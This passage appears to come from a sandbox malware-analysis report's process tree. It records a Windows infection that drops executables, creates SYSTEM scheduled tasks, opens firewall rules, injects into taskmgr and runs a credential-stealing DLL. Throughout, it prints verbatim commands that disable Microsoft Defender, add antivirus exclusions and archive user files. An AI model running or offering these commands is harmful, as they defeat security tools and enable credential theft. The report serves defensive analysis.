C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe"C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\QiAtIglbeauCaEygsP90Kflf.exe"C:\Users\Admin\Pictures\QiAtIglbeauCaEygsP90Kflf.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 05:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe\" Wt /ysXdidPVuH 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exeC:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e5ae1d0,0x6e5ae1dc,0x6e5ae1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5256 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428054213" --session-guid=8bb6ec06-836c-494f-9fdb-cd7782db5ad4 --server-tracking-blob="OTY3OGQ4MGZlZmJhODZiYjdlM2Y4M2UxMzY2NGU1ODY5ZjYzNzkzNTY1YmJjZjBlNjViMzVjNmNjYmU3YWVmMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MjgyOTI1LjI4NzIiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiZmM3MzFlMDctOTFmMC00OGUyLWI4YjctNTczZjkyZTFhNWMxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=34050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exeC:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d3be1d0,0x6d3be1dc,0x6d3be1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x9d6038,0x9d6044,0x9d60506⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\leykNOBNSzbftkeOiFe2gzF6.exe"C:\Users\Admin\Pictures\leykNOBNSzbftkeOiFe2gzF6.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"6⤵
-
C:\Users\Admin\Pictures\pLUaCKBxfWyIAv3qV3OFZGpE.exe"C:\Users\Admin\Pictures\pLUaCKBxfWyIAv3qV3OFZGpE.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 05:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe\" Wt /nOMdidyFFk 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3564 -ip 35641⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe Wt /ysXdidPVuH 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
